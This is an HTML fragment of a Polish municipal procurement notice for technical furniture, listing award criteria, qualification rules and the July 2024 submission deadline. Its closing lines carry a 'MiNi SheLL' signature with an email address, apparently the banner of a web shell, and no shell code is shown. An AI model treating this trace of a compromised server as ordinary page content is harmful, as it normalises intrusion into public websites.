class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Najdłuższy okres gwarancji i rękojmi na wykonany przedmiot zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie nr 2: Meble techniczne<br/><br/><br/><br/>1.	Biurko – 1<br/>2.	Kontener biurowy z 4 szufladami – 1<br/>3.	Stół warsztatowy – 1<br/>4.	Stół warsztatowy z szufladami – 1<br/>5.	Stół techniczny komputerowy – 15<br/>6.	Krzesło biurowe – 15<br/>7.	Metalowa podstawa pod komputer – 17<br/>8.	Szafa metalowa – 2<br/>9.	Stół roboczy do warsztatu – 1<br/>10.	Stół roboczy do warsztatu – 2<br/>11.	Krzesło robocze na ślizgaczach – 1<br/>12.	Szafa metalowa – 2<br/>13.	Stół warsztatowy z nadstawką i oświetleniem – 2<br/>14.	Taboret roboczy na ślizgach – 40<br/>15.	Regał półkowy – 5<br/>16.	Stół warsztatowy – 1<br/>17.	Krzesło robocze z uchwytem – 22<br/>18.	Stół warsztatowy – 2<br/>19.	Stół konferencyjny – 1<br/>20.	Stół konferencyjny – 1<br/>21.	Stół konferencyjny – 5<br/>22.	Skrzynka na klucze z zamkiem elektronicznym – 1<br/>23.	Szafka na klucze przeszklona – 1<br/>24.	Mównica – 2<br/>25.	Sejf meblowy – 1<br/>26.	Szafa ze szklanymi drzwiami – 2<br/>27.	Stolik pod rzutnik – 1<br/>28.	Gablota wewnętrzna na stojaku – 4<br/>29.	Gablota wewnętrzna – 6<br/>30.	Gablota wewnętrzna – 2<br/>31.	Krzesło biurowe – 1<br/>32.	Fotel skórzany – 4<br/>33.	Stół konferencyjny – 3<br/>34.	Biurko – 1<br/>35.	Stojak na ubrania – 5<br/>36.	Wieszak stojący – 1<br/>37.	Wieszak szeregowy dwustronny – 5<br/>38.	Wieszak ścienny – 8<br/>39.	Wózek platformowy ze składanym uchytem – 1<br/>40.	Wózek platformowy – 1<br/>41.	Wózek platformowy składany – 1<br/>42.	Wózek mobilny na laptopy – 1<br/>43.	Drabina z platformą niska - 1<br/>44.	Drabina z platformą średnia – 1<br/>45.	Wózek ogrodowy – 1<br/>46.	Ławka 4-miejscowa ze stolikiem – 5<br/>47.	Ławka 3-miejscowa – 2<br/>48.	Ławka 2-miejscowa – 1<br/>49.	Stół szklany okrągły - 2 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39150000-8 - Różne meble i wyposażenie</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">60 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Najdłuższy okres gwarancji i rękojmi na wykonany przedmiot zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Nie dotyczy</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Nie dotyczy</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Nie dotyczy <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1) formularz ofertowy, stanowiący załącznik nr 1 do SWZ wraz z załącznikiem,<br/>2) oświadczenie o niepodleganiu wykluczeniu i spełnianiu warunków udziału w postepowaniu, składane na podstawie art.<br/>125 ust. 1 ustawy PZP – wzór oświadczenia zawarto w załączniku nr 2 do SWZ, z zastrzeżeniem, że:<br/>a) w przypadku wspólnego ubiegania się o zamówienie przez Wykonawców – oświadczenie, o którym mowa w ppkt. 2,<br/>składa każdy z Wykonawców,<br/>3) pełnomocnictwo upoważniające do złożenia oferty, o ile ofertę składa pełnomocnik,<br/>4) w przypadku oferty składanej przez wykonawców wspólnie ubiegających się o udzielenie zamówienia - pełnomocnictwo<br/>do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia i/lub zawarcia<br/>umowy w sprawie zamówienia w imieniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>5) dokument potwierdzający wniesienie wadium, jeżeli zamawiający żądał wniesienia wadium <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość dokonania istotnych zmian umowy w stosunku do treści oferty, na podstawie której<br/>dokonano wyboru Wykonawcy, zgodnie z projektowanymi postanowienia umowy, stanowiącymi załącznik nr 3 do SWZ oraz<br/>ustawą PZP. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-07-30 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">W prowadzonym postępowaniu Wykonawcy składają swoje oferty za pośrednictwem Platformy Przetargowej Urzędu Miasta Włocławek dostępnej pod adresem: https://umwloclawek.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-07-30 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-08-28</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com